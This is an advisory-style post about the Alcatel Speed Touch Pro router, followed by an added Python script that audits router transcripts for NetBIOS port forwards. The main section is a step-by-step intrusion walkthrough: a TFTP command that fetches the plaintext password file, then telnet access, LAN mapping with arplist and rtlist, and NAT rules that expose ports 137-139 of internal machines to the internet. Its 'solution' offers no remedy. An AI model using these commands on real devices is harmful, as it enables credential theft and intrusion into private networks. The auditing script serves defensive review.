COMMAND
ALCATEL Speed Touch PRO
SYSTEMS AFFECTED
ALCATEL Speed Touch PRO
PROBLEM
Stefano Chiccarelli posted the following. Taking advantage of the
ALCATEL Speed Touch Pro backdoor and configuration problems, it
is possible to obtain "full priv" access to the router and
launch several attacks against the internal LAN, thanks to the
NAT/PAT feature that is often made available.
If the router is "telnetable", it means that the "ip config
firewalling" mode is "off" and it accepts internet connections on the
WAN interface's IP. Now the choice is:
a - use Shimomura Tsutomu's backdoor
b - use this command line
tftp -i IPTARGET GET active/system.ini
to read the unencrypted password.
Among other things, it is possible to gain access to the computer(s)
behind the router. 90 times out of 100, you will find a Microsoft-
based LAN (especially a NetBIOS LAN) active. So the intruder can
map the whole "network status" by entering the IP> menu and then
running arplist. The screen looks this way:
neuro@neuroneuro$ --> telnet router
Trying 192.168.0.1...
Connected to router.
Escape character is '^]'.
User :
SpeedTouch (00-90-D0-04-47-0D)
Password :
######------------------------------------------------------------------------
*
* ______
* ___/_____/\
* / /\\ ALCATEL ADSL MODEM
* _____/__ / \\
* _/ /\_____/___ \ Version 3.2
* // / \ /\ \
* _______//_______/ \ / _\/______ Copyright 1999-2000.
* / / \ \ / / / /\
* __/ / \ \ / / / / _\__
* / / / \_______\/ / / / / /\
* /_/______/___________________/ /________/ /___/ \
* \ \ \ ___________ \ \ \ \ \ /
* \_\ \ / /\ \ \ \ \___\/
* \ \/ / \ \ \ \ /
* \_____/ / \ \ \________\/
* /__________/ \ \ /
* \ _____ \ /_____\/
* \ / /\ \ /
* /____/ \ \ /
* \ \ /___\/
* \____\/
*
-----------------------------------------------------------------------
=>ip
[ip]=>arplist
Intf IP-address HW-address Type
eth0 192.168.0.2 00:00:b4:59:36:6c DYNAMIC
eth0 192.168.0.3 00:c0:26:ca:25:5e DYNAMIC
[ip]=>
It is also possible to check the routing table to learn the
internal LAN addressing. The command is:
[ip]=>rtlist
Destination Source Gateway Intf Mtrc
192.168.0.0/24 192.168.0.0/24 192.168.0.1 eth0 1
192.168.0.1/32 0.0.0.0/0 192.168.0.1 eth0 0
217.59.X.XXX/32 0.0.0.0/0 217.59.X.XXX cip0 0
127.0.0.1/32 0.0.0.0/0 127.0.0.1 loop 0
217.59.X.XXX/30 0.0.0.0/0 217.59.X.XXX cip0 1
192.168.0.0/24 0.0.0.0/0 192.168.0.1 eth0 1
0.0.0.0/0 0.0.0.0/0 217.59.X.XXX cip0 1
Now, let's ping the other machines to find the "powered on" ones
(certainly the boxes shown by arplist, but some "hidden" machine
could exist):
[ip]=>:ip ping addr=192.168.0.2 count=10 size=100 interval=100 listen=off
108 bytes from 192.168.0.2: icmp_seq=0 time=2511 us
108 bytes from 192.168.0.2: icmp_seq=1 time=2337 us
108 bytes from 192.168.0.2: icmp_seq=2 time=2393 us
108 bytes from 192.168.0.2: icmp_seq=3 time=2314 us
108 bytes from 192.168.0.2: icmp_seq=4 time=2324 us
108 bytes from 192.168.0.2: icmp_seq=5 time=2333 us
108 bytes from 192.168.0.2: icmp_seq=6 time=2453 us
108 bytes from 192.168.0.2: icmp_seq=7 time=2350 us
108 bytes from 192.168.0.2: icmp_seq=8 time=2299 us
108 bytes from 192.168.0.2: icmp_seq=9 time=2353 us
We've found that 192.168.0.2 is on, and we can redirect ports
thanks to the NAT/PAT features, so that we are allowed to access
192.168.0.2 from the outside.
It is now possible to redirect ports 137, 138 and 139 TCP/UDP and
map the NetBIOS resources straight to the internet. The command
is:
NAT>create protocol=tcp inside_addr=192.168.0.2:137 outside_addr=217.59.9.154:137
[repeat for all the ports (either tcp or udp) you are interested in]
After this step, the intruder can open the shared directories on
the private-IP LAN behind the ALCATEL router:
\\ipdelrouteralcatel
SOLUTION
Sharing whole HDs on a private LAN is quite common, because
people feel protected from outside attacks. It is obvious that it
is possible to redirect ALL TCP/UDP ports toward those services
we know to be "bugged". The only limit is imagination.
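The NAT/PAT mappings described under PROBLEM are easy to spot when auditing a saved command transcript or configuration dump of the router. The script below is an added example, not part of the original post: it assumes the mappings appear in the "create protocol=... inside_addr=... outside_addr=..." syntax quoted above, and the sample lines and the outside address 203.0.113.10 are constructed.

```python
import re
from typing import Dict, List

# NetBIOS ports that the advisory shows being forwarded to an inside host.
# A mapping of any of these to the WAN side publishes LAN file shares to the internet.
NETBIOS_PORTS = {137, 138, 139}

# Matches the router's "create" syntax as quoted in the advisory, e.g.
#   create protocol=tcp inside_addr=192.168.0.2:137 outside_addr=217.59.9.154:137
NAT_RE = re.compile(
    r"create\s+protocol=(?P<proto>tcp|udp)\s+"
    r"inside_addr=(?P<in_ip>[\d.]+):(?P<in_port>\d+)\s+"
    r"outside_addr=(?P<out_ip>[\d.]+):(?P<out_port>\d+)"
)


def parse_nat_rules(text: str) -> List[Dict]:
    """Extract every NAT/PAT mapping found in a transcript or saved command list."""
    rules = []
    for m in NAT_RE.finditer(text):
        rules.append({
            "proto": m["proto"],
            "inside_ip": m["in_ip"], "inside_port": int(m["in_port"]),
            "outside_ip": m["out_ip"], "outside_port": int(m["out_port"]),
        })
    return rules


def audit_nat_rules(rules: List[Dict]) -> List[str]:
    """Return one finding per mapping that exposes a NetBIOS port on the WAN address."""
    findings = []
    for r in rules:
        if r["inside_port"] in NETBIOS_PORTS or r["outside_port"] in NETBIOS_PORTS:
            findings.append(
                f"{r['proto']}/{r['outside_port']} on {r['outside_ip']} forwards to "
                f"{r['inside_ip']}:{r['inside_port']} (NetBIOS exposed to the internet)"
            )
    return findings


# Constructed sample transcript: three mappings, two of which publish NetBIOS.
SAMPLE = """\
NAT>create protocol=tcp inside_addr=192.168.0.2:139 outside_addr=203.0.113.10:139
NAT>create protocol=udp inside_addr=192.168.0.2:137 outside_addr=203.0.113.10:137
NAT>create protocol=tcp inside_addr=192.168.0.3:443 outside_addr=203.0.113.10:443
"""

if __name__ == "__main__":
    for finding in audit_nat_rules(parse_nat_rules(SAMPLE)):
        print("WARNING:", finding)
```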